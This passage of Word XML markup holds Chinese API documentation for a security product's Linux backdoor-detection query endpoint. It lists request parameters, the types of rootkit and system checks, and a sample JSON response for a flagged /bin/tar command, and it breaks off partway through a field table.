    <w:p w14:paraId="41A2EA97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux后门检测扫描结果的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E84DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220BDC3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/backdoor/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CF4B7"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2359"/>
        <w:gridCol w:w="1074"/>
        <w:gridCol w:w="839"/>
        <w:gridCol w:w="5810"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6E47F6A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814E12D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340F6D3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EDE9A98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CDDA677" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15BBFCB8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59CD3855" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F6F769" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D7E4B84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4123CEA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62D246B1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67DAD1B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50AC667F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E4EA23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F6E594" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31200A5F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37EED722" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60BFFD3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40629E05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2254FAA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="11B2354E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353A991B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24107C4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="277D4122" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3880CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>后门类型，包含： 应用后门，Bootkit，Rootkit；恶意进程会返回对应检测库中的后门类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5995B660" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB3BC56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorCheckNames</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164D28A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="291C65DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="417C5355" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查功能，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="linux后门检查功能">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>Linux后门检查功能</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="383A1B85" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F825A30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26CAD10F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC2FC52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C56C7C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="283E8014" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>Linux检查功能字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2641"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="03A4F0E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0C4530A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B25CF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="66C999C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69BBBC34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>RPM-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62300200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="465ED6D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1C868F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DPKG-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6463090B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BBB7472" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F63F860" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>磁盘MBR检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="793C5CA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39A44637" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016F03F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>计划任务检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF810AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="483C41B3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E268601" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>动态链接库检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56EFCA99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="204FEC68" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB13C01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基本命令检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C57D340" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76BA05D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="352D276D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>已知rootkit检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="204E4BAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72E97871" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597EC259" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统内核模块检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF2C7D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6FC5CA65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01BE7247" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>网络状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0232BE93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="639A5D53" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F26FFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CBEED17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D296049" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33FB2E6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统文件状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46307C9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4796B9E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475FB4C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA6EB1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C66FB94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE581A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/backdoor/linux?page=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28169053" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AB8072" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "oldtcm",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "createTime": 1528398278,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "backDoorType": "Rootkit",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "backDoorName": "检查\"/bin/tar\"命令",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "backDoorCheckName": "基本命令检查",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "通过检测strings命令成功后，利用strings命令打印命令的段信息，然后查找这些命令中是否有特征值，如果有那么表示该命令有问题",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "detail": "{\"cmd\":\"/bin/tar\",\"match_rules\":{\"137\":\"^...s\"}}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "instruct": "替换相应命令，并且重新检查",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B430C"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2263"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4297"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="040B3D2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7F7EE97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D88D86A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E3583D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DBCEE34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="45FAACEC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E34AE65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06133442" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C87A1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B012525" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C60F14F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
